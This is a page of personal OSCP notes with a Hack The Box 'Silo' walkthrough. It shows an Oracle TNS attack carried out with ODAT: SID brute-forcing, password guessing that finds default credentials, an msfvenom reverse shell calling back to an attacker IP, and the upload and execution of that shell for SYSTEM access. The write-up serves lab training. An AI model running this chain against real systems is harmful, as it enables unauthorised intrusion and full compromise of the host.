O
O
OSCP Notes
Search
K
Comment on page

Silo (Windows/Oracle)

https://qwertty.info/blog/htb-silo-writeup
Nmap Scan Result
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-time:
| date: 2022-01-21T19:57:57
|_ start_date: 2022-01-21T19:45:43
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
http has a blank IIS page .
Run a gobuster\
To attack the oracle system on 1521, download https://github.com/quentinhardy/odat
and follow the steps.

Exploitation

We discovered the vulnerability of the box. No we have to search for an existing exploit or tool that we can use for our case. After a while I found the ODAT (Oracle Database Attacking Tool). In the README.md I found a module for our CVE-2012-1675. So let's try this tool.
First we have to clone the repo and change our directory to it:
$ git clone https://github.com/quentinhardy/odat.git
$ cd odat
Now we can try the tnspoison module:
$ python3 odat.py tnspoison -s 10.10.10.82 --test-module
07:43:54 CRITICAL -: The server SID or Service Name must be given with the '-d SID' or '-n serviceName' option.
But we need the server SID. Let's see how we can discover it.
The help menu of odat.py show's us a module sidguesser. I think this is what we need.
$ python3 odat.py sidguesser -s 10.10.10.82
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...
############################################################################################################### | ETA: 00:00:00
100% |###########################################################################################################| Time: 00:01:30
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###########################################################################################################| Time: 00:00:02
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue... ############################################################################## | ETA: 00:00:08
100% |###########################################################################################################| Time: 00:01:13
[+] SIDs found on the 10.10.10.82:1521 server: XE
And we got our SID: XE
Now we can test again the tnspoison module. I always try to verify the vulnerability before I ran into a rabbit hole.
$ python3 odat.py tnspoison -s 10.10.10.82 -d XE --test-modul
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?
[+] The target is vulnerable to a remote TNS poisoning
Yes, it works. In the help menu of odat.py I saw the module passwordguesser. Maybe we can extract some credentials. Because we got the SID. This is mostly always required for the modules.
$ python3 odat.py passwordguesser -s 10.10.10.82 -d XE
[1] (10.10.10.82:1521): Searching valid accounts on the 10.10.10.82 server, port 1521
....
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
Awesome! We found some valid credentials. So maybe we are able to upload our reverse shell. There is a module named utlfile. With this we can upload/download/delete files. But first we have to create our reverse shell.
I will use msfvenom for it:
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f exe > qwertty.exe
Now we can upload it with the odat.py
$ python3 odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile c:/ qwertty.exe ../qwertty.exe
[1] (10.10.10.82:1521): Put the ../qwertty.exe local file in the c:/ folder like qwertty.exe on the 10.10.10.82 server
[+] The ../qwertty.exe file was created on the c:/ directory on the 10.10.10.82 server like the qwertty.exe file
Nice, the file was created on the box.
No let's start our nc listener on port 4444
$ nc -lvnp 4444
Now we can use the module externaltable. It took me a while to discover this module because it is not an obvious name for what we was looking for. But the description says what we want:
to read files or to execute system commands/scripts
Let's try it:
$ python3 odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec c:/ qwertty.exe
[1] (10.10.10.82:1521): Execute the qwertty.exe command stored in the c:/ path
Hopefully we got the reverse shell. Let's check our nc listener:
$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.82] 49163
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>whoami
whoami
nt authority\system
C:\oraclexe\app\oracle\product\11.2.0\server\DATABASE>
Copy
Nice! We got the shell. Now we can grab the user and root flag.
----
Odat installation
Initially, I couldn't convert the rpm to deb like the instruction and found this post here: https://askubuntu.com/questions/215624/alien-cannot-built-package-for-architecture-ubuntu-amd64